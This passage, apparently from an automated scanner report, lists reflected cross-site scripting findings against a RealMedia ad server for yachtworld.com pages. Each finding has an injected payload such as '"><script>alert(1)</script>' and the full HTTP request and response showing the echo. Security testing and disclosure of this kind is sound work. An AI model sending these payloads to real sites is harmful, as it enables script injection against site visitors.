var TFSMFlash_OASCLICK="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/homepage.html98647"-alert(1)-"dcca8500db7/L35/1037820945/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c?";
var TFSMFlash_SWFCLICKVARIABLE="?clickTAG="+TFSMFlash_OASCLICK ;
var TFSMFlash_SWFFI
...[SNIP]...

1.18. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef17e"-alert(1)-"0297e7d3d0a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35ef17e"-alert(1)-"0297e7d3d0a/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1384
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="8";
var TFSMFlash_WMODE="opaque";
var TFSMFlash_OASCLICK="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/homepage.html/L35ef17e"-alert(1)-"0297e7d3d0a/L/1327284707/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c?";
var TFSMFlash_SWFCLICKVARIABLE="?clickTAG="+TFSMFlash_OASCLICK ;
var TFSMFlash_SWFFILE
...[SNIP]...

1.19. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf28c"><script>alert(1)</script>a87472e101e was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35cf28c"><script>alert(1)</script>a87472e101e/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1408
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="8";
var TFSMFlash_WMODE="opaque";
var TFSMFlash_OASCLICK="http://oasc05139.247realmed
...[SNIP]...
<IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35cf28c"><script>alert(1)</script>a87472e101e/L/8322780/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

1.20. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f9cb"-alert(1)-"1adcbb1abf8 was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position24f9cb"-alert(1)-"1adcbb1abf8/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1408
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="8";
var TFSMFlash_WMODE="opaque";
var TFSMFlash_OASCLICK="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/homepage.html/L35/1910172768/Position24f9cb"-alert(1)-"1adcbb1abf8/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c?";
var TFSMFlash_SWFCLICKVARIABLE="?clickTAG="+TFSMFlash_OASCLICK ;
var TFSMFlash_SWFFILE="http://imagec17.247re
...[SNIP]...

1.21. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c2a0"><img%20src%3da%20onerror%3dalert(1)>e533d006f2d was submitted in the REST URL parameter 9. This input was echoed as 1c2a0"><img src=a onerror=alert(1)>e533d006f2d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position21c2a0"><img%20src%3da%20onerror%3dalert(1)>e533d006f2d/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1462
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="8";
var TFSMFlash_WMODE="opaque";
var TFSMFlash_OASCLICK="http://oasc05139.247realmed
...[SNIP]...
<IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1893271425/Position21c2a0"><img src=a onerror=alert(1)>e533d006f2d/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

1.22. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6840c"><script>alert(1)</script>b8b606ef5e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c?6840c"><script>alert(1)</script>b8b606ef5e5=1 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:37 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1369
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="8";
var TFSMFlash_WMODE="opaque";
var TFSMFlash_OASCLICK="http://oasc05139.247realmed
...[SNIP]...
realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/2129333911/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c?_RM_EMPTY_&6840c"><script>alert(1)</script>b8b606ef5e5=1" WIDTH=2 HEIGHT=2>

1.23. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b8e3"%3bfc81b595cca was submitted in the REST URL parameter 4. This input was echoed as 5b8e3";fc81b595cca in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com5b8e3"%3bfc81b595cca/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1701
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/bayliner8-cruiser-yen-hp300/300-cruiser-bayliner8
...[SNIP]...
MFlash_VERSION = "10";
var TFSMFlash_WMODE = "opaque";

           var TFSMFlash_OASCLICK = "http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com5b8e3";fc81b595cca/en/homepage.html/L35/1782363314/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c";
   

var TFSMFlash_SWFCLICKVARIABLE = "?clickTAG
...[SNIP]...

1.24. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9daed"><script>alert(1)</script>a99280c754f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com9daed"><script>alert(1)</script>a99280c754f/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1749
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/bayliner8-cruiser-yen-hp300/300-cruiser-bayliner8
...[SNIP]...
<IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com9daed"><script>alert(1)</script>a99280c754f/en/homepage.html/L35/958596098/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

1.25. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a762d"%3b28338864315 was submitted in the REST URL parameter 5. This input was echoed as a762d";28338864315 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/ena762d"%3b28338864315/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1701
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/bayliner8-cruiser-yen-hp300/300-cruiser-bayliner8
...[SNIP]...
ash_VERSION = "10";
var TFSMFlash_WMODE = "opaque";

           var TFSMFlash_OASCLICK = "http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/ena762d";28338864315/homepage.html/L35/2121153343/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c";
   

var TFSMFlash_SWFCLICKVARIABLE = "?clickTAG="+
...[SNIP]...

1.26. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fba5a"><script>alert(1)</script>83b190f00e7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/enfba5a"><script>alert(1)</script>83b190f00e7/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1751
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/bayliner8-cruiser-yen-hp300/300-cruiser-bayliner8
...[SNIP]...
<IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/enfba5a"><script>alert(1)</script>83b190f00e7/homepage.html/L35/1792748296/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

1.27. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8930"><script>alert(1)</script>e960f28911d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.htmld8930"><script>alert(1)</script>e960f28911d/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1751
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/bayliner8-cruiser-yen-hp300/300-cruiser-bayliner8
...[SNIP]...
<IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.htmld8930"><script>alert(1)</script>e960f28911d/L35/2025447884/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

1.28. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 621e5"-alert(1)-"dc13a113eb4 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html621e5"-alert(1)-"dc13a113eb4/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1721
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
